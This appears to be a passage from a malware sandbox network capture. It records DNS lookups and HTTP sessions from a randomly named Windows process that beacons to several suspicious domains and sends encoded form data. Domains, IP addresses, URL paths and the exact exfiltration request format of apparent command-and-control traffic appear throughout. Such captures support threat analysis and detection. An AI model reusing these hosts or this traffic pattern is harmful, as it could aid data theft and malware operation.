                                                      Jan 10, 2025 21:48:03.514204025 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:03.514256954 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:03.515849113 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:03.520605087 CET8050003108.181.189.7192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 21:46:41.063204050 CET | 192.168.2.6 | 1.1.1.1 | 0xe344 | Standard query (0) | www.75178.club | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:46:57.212524891 CET | 192.168.2.6 | 1.1.1.1 | 0x21a0 | Standard query (0) | www.bcg.services | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:10.680228949 CET | 192.168.2.6 | 1.1.1.1 | 0x111 | Standard query (0) | www.egldfi.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:18.758699894 CET | 192.168.2.6 | 1.1.1.1 | 0xf82d | Standard query (0) | www.betmatchx.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:26.836257935 CET | 192.168.2.6 | 1.1.1.1 | 0x1a20 | Standard query (0) | www.43kdd.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:41.101629019 CET | 192.168.2.6 | 1.1.1.1 | 0x863d | Standard query (0) | www.lgdiamonds.info | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:54.492594004 CET | 192.168.2.6 | 1.1.1.1 | 0x700c | Standard query (0) | www.jalan2.online | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 21:46:41.767545938 CET | 1.1.1.1 | 192.168.2.6 | 0xe344 | No error (0) | www.75178.club | uaslkd.skasdhu.huhusddfnsuegcdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:46:41.767545938 CET | 1.1.1.1 | 192.168.2.6 | 0xe344 | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gtml.huksa.huhusddfnsuegcdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:46:41.767545938 CET | 1.1.1.1 | 192.168.2.6 | 0xe344 | No error (0) | gtml.huksa.huhusddfnsuegcdn.com | - | 23.167.152.41 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:46:57.366874933 CET | 1.1.1.1 | 192.168.2.6 | 0x21a0 | No error (0) | www.bcg.services | - | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:46:57.366874933 CET | 1.1.1.1 | 192.168.2.6 | 0x21a0 | No error (0) | www.bcg.services | - | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:10.691370964 CET | 1.1.1.1 | 192.168.2.6 | 0x111 | Name error (3) | www.egldfi.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:18.768562078 CET | 1.1.1.1 | 192.168.2.6 | 0xf82d | Name error (3) | www.betmatchx.online | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:27.534749031 CET | 1.1.1.1 | 192.168.2.6 | 0x1a20 | No error (0) | www.43kdd.top | 43kdd.top | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:47:27.534749031 CET | 1.1.1.1 | 192.168.2.6 | 0x1a20 | No error (0) | 43kdd.top | - | 154.23.178.231 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:41.136173010 CET | 1.1.1.1 | 192.168.2.6 | 0x863d | No error (0) | www.lgdiamonds.info | - | 130.185.109.77 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:47:54.506529093 CET | 1.1.1.1 | 192.168.2.6 | 0x700c | No error (0) | www.jalan2.online | jalan2.online | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:47:54.506529093 CET | 1.1.1.1 | 192.168.2.6 | 0x700c | No error (0) | jalan2.online | - | 108.181.189.7 | A (IP address) | IN (0x0001) | false

• www.75178.club
• www.bcg.services
• www.43kdd.top
• www.lgdiamonds.info
• www.jalan2.online
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49958 | 23.167.152.41 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:46:41.789952993 CET | 481 | OUT | GET /vl4d/?jxk=HtO4sxDXWj2&grix=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3k9iw4Eb0W9eqh06xomc0IPDFwjqEVOXfa2YeBvnOQ4os/FobUM= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.75178.club
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49986 | 13.248.169.48 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:46:57.394205093 CET | 739 | OUT | POST /5onp/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 209
Host: www.bcg.services
Origin: http://www.bcg.services
Referer: http://www.bcg.services/5onp/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: grix=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31O14KxVHG4P4Cr6oFyCflvqJXpk7+B3uJVojUVT+H5Zx
Jan 10, 2025 21:46:57.842247963 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49988 | 13.248.169.48 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:46:59.960534096 CET | 763 | OUT | POST /5onp/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 233
Host: www.bcg.services
Origin: http://www.bcg.services
Referer: http://www.bcg.services/5onp/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: grix=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjtiv/DNPzmvHI9+X3Atb2jPQjGXsQeL3TOCXJ9ZoxmwQfCH9iPbAvMzGi7D/bBXbykqRl2ubq+xVAUrmqheOSf6IRX9FtUoSoDa6SymHaRbDkWXt6VmMzRLF3/8KMXBRca/vK9nyZBC83/KLXr8J+h3ELVQjGCfZIN8Sxz/whjkdm4cdz9quxFfVtA==
Jan 10, 2025 21:47:00.392098904 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49989 | 13.248.169.48 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:47:02.571429968 CET | 1776 | OUT | POST /5onp/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 1245
Host: www.bcg.services
Origin: http://www.bcg.services
Referer: http://www.bcg.services/5onp/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49990 | 13.248.169.48 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:47:05.119551897 CET | 483 | OUT | GET /5onp/?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj2 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.bcg.services
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 21:47:05.664601088 CET | 393 | IN | HTTP/1.1 200 OK
content-type: text/html
date: Fri, 10 Jan 2025 20:47:05 GMT
content-length: 272
connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj2"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49991 | 154.23.178.231 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:47:27.558289051 CET | 730 | OUT | POST /bsyy/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 209
Host: www.43kdd.top
Origin: http://www.43kdd.top
Referer: http://www.43kdd.top/bsyy/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: grix=9/+MxePuBp2hPlU4y3iJYKQBTutkyEw4oHbEEqtWMiV8dOsR19uoMKpCufpYEHTiyAOrMvZeWDw4jaRs7HTgzSaR6l7T8q9n+WzZ5vDQ0mSreIBmUk4NFAhqzWgziDxXER0tUTK4OP0M/67cwzOCnf/6z4ZKopxEHQfWrdCS6WQNxbrczCGU9G6xzwOaUTUb4aXM70XGCjY/
Jan 10, 2025 21:47:28.430403948 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 10 Jan 2025 20:47:28 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       6 | 192.168.2.6 | 49993 | 154.23.178.231 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Jan 10, 2025 21:47:30.106926918 CET | 754 | OUT | POST /bsyy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 233
                                                      Host: www.43kdd.top
                                                      Origin: http://www.43kdd.top
                                                      Referer: http://www.43kdd.top/bsyy/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 6c 38 65 75 38 52 32 38 75 6f 4c 4b 70 43 68 2f 70 6e 4b 6e 54 72 79 41 44 63 4d 76 31 65 57 48 59 34 6a 66 74 73 6e 6c 37 6a 68 79 61 66 38 6c 37 52 68 36 39 6e 2b 57 7a 5a 35 76 57 31 30 6d 61 72 65 34 52 6d 56 46 34 4b 49 67 68 74 32 57 67 7a 6d 44 78 54 45 52 30 44 55 58 43 57 4f 4b 77 4d 2f 37 72 63 31 79 4f 46 74 66 2f 67 38 59 59 2f 68 73 6f 41 47 44 69 51 30 4f 36 42 73 32 31 74 77 74 32 47 76 78 47 33 76 57 61 7a 7a 79 57 6f 55 7a 55 78 36 61 76 4d 70 6a 62 68 4e 58 39 63 35 78 2f 52 46 43 69 61 68 65 67 33 46 38 39 48 39 52 77 37 47 41 3d 3d
                                                      Data Ascii: grix=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3l8eu8R28uoLKpCh/pnKnTryADcMv1eWHY4jftsnl7jhyaf8l7Rh69n+WzZ5vW10mare4RmVF4KIght2WgzmDxTER0DUXCWOKwM/7rc1yOFtf/g8YY/hsoAGDiQ0O6Bs21twt2GvxG3vWazzyWoUzUx6avMpjbhNX9c5x/RFCiaheg3F89H9Rw7GA==
                                                       Jan 10, 2025 21:47:31.006692886 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 20:47:30 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       7 | 192.168.2.6 | 49994 | 154.23.178.231 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Jan 10, 2025 21:47:32.654007912 CET | 1767 | OUT | POST /bsyy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Host: www.43kdd.top
                                                      Origin: http://www.43kdd.top
                                                      Referer: http://www.43kdd.top/bsyy/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 74 38 64 64 6b 52 30 66 47 6f 4b 4b 70 43 6f 66 70 63 4b 6e 53 37 79 44 7a 59 4d 76 70 6f 57 42 63 34 69 35 35 73 72 45 37 6a 72 79 61 66 78 46 37 53 38 71 38 6a 2b 58 66 64 35 76 47 31 30 6d 61 72 65 36 5a 6d 57 55 34 4b 62 77 68 71 7a 57 67 33 69 44 78 33 45 52 38 31 55 58 48 6a 4e 35 34 4d 2f 61 62 63 33 67 6d 46 68 66 2f 2b 39 59 59 6e 68 73 73 50 47 44 2b 79 30 50 4f 72 73 31 70 74 78 35 54 35 7a 41 71 68 31 48 61 69 72 6a 6d 70 64 57 67 34 30 73 58 57 35 56 44 79 43 6c 52 38 68 42 7a 76 42 7a 4b 65 73 49 4e 58 4c 73 63 7a 2b 79 56 79 46 42 73 63 45 7a 56 37 69 7a 35 38 35 78 58 4d 2f 4d 6e 70 4a 2f 6e 47 30 33 55 42 4f 58 32 69 43 71 2f 54 74 67 48 51 68 72 41 2f 75 69 71 7a 54 63 44 57 66 77 6d 65 54 62 68 32 52 53 59 4c 4d 55 53 69 61 72 56 56 63 75 51 74 71 57 72 42 6d 4a 35 33 30 57 2f 53 66 36 52 69 6d 63 67 76 57 58 57 47 4c 42 6f 31 58 5a 35 43 39 [TRUNCATED]
                                                       Data Ascii: grix=[TRUNCATED]
                                                       Jan 10, 2025 21:47:33.644891024 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 20:47:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       8 | 192.168.2.6 | 49995 | 154.23.178.231 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Jan 10, 2025 21:47:35.203078032 CET | 480 | OUT | GET /bsyy/?grix=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVs1zZ2HmJ/p0t/zKv7OSTrBDtbJtNF3YKND91rSNX8lR/VDEldzg=&jxk=HtO4sxDXWj2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.43kdd.top
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                       Jan 10, 2025 21:47:36.092259884 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 20:47:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       9 | 192.168.2.6 | 49996 | 130.185.109.77 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Jan 10, 2025 21:47:41.170913935 CET | 748 | OUT | POST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 209
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6d 6b 4f 63 6a 50 53 2b 4c 4f 52 48 72 49 30 6c 6a 6d 4a 64 61 59 49 53 6d 31 7a 59 34 56 35 67 30 56 44 69 71 55 67 53 66 34 75 76 4b 35 68 57 5a 70 65 39 6f 66 47 78 58 50 6f 44 69 34 43 49 70 70 4c 78 68 7a 62 4b 6c 42 72 78 58 72 75 39 57 54 76 64 33 65 36 64 45 55 62 47 2b 51 6e 2f 76 69 39 61 50 53 77 44 69 41 52 6a 6a 2b 78 76 77 75 48 4f 53 4f 66 39 37 66 59 77 43 4e 44 77 76 6a 2f 53 79 58 46 6c 2b 2b 6b 34 34 75 4f 59 5a 35 44 6c 44 38 6e 52 61 49 65 67 79 62 32 79 69 43 52 76 75 72 49 52 6a 5a 39 43 59 71 48 78 31 61 6a 6c 71 31 4c 2f 49 5a 52 35 39 4d 4e 30
                                                      Data Ascii: grix=HK56D0Zh/f+HmkOcjPS+LORHrI0ljmJdaYISm1zY4V5g0VDiqUgSf4uvK5hWZpe9ofGxXPoDi4CIppLxhzbKlBrxXru9WTvd3e6dEUbG+Qn/vi9aPSwDiARjj+xvwuHOSOf97fYwCNDwvj/SyXFl++k44uOYZ5DlD8nRaIegyb2yiCRvurIRjZ9CYqHx1ajlq1L/IZR59MN0
                                                       Jan 10, 2025 21:47:41.772505045 CET | 322 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 20:47:41 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       10 | 192.168.2.6 | 49997 | 130.185.109.77 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Jan 10, 2025 21:47:43.718034983 CET | 772 | OUT | POST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 233
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6e 74 67 30 30 7a 69 72 51 4d 53 63 34 75 76 43 5a 67 39 58 4a 66 2f 6f 66 36 35 58 4b 51 44 69 38 71 49 70 72 44 78 68 43 62 4e 6a 52 72 7a 61 4c 76 62 53 54 76 64 33 65 36 64 45 55 50 34 2b 51 2f 2f 75 53 4e 61 50 7a 77 41 2b 51 52 73 72 65 78 76 36 2b 48 4b 53 4f 65 48 37 62 59 4b 43 50 37 77 76 69 50 53 78 43 78 6d 30 2b 6b 2b 79 4f 50 75 52 5a 57 54 4a 36 79 78 64 61 79 45 72 62 2b 4f 6a 30 4d 31 79 59 49 79 78 4a 64 41 59 6f 66 44 31 36 6a 50 6f 31 7a 2f 61 4f 64 65 79 34 6f 58 38 48 70 33 35 6c 4d 6e 4c 35 2b 61 36 49 5a 56 55 62 65 70 77 77 3d 3d
